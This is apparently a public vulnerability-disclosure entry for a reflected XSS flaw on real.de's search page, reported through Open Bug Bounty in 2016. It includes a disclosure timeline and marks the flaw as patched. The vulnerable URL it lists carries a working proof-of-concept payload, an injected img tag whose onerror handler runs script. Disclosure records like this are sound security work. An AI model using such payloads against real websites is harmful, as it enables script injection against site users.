logo
DATABASE RESOURCES PRICING ABOUT US

real.de XSS vulnerability

Description

##### Vulnerable URL: http://www.real.de/suche.html?q=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt(%27XSSPOSED%27)%3E&channel;=onlineshop ##### Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 11915 VIP website status:| Yes Check real.de SSL connection:| (Grade: A+) ##### Coordinated Disclosure Timeline: Description| Value ---|--- Vulnerability submitted via Open Bug Bounty| 25 September, 2016 00:19 GMT Generic security notifications sent to website owner| 25 September, 2016 00:22 GMT Notification sent to subscribers (without technical details)| 25 September, 2016 02:17 GMT Vulnerability details disclosed by researcher| 16 October, 2016 01:13 GMT Vulnerability patched by the website owner| 16 October, 2016 16:32 GMT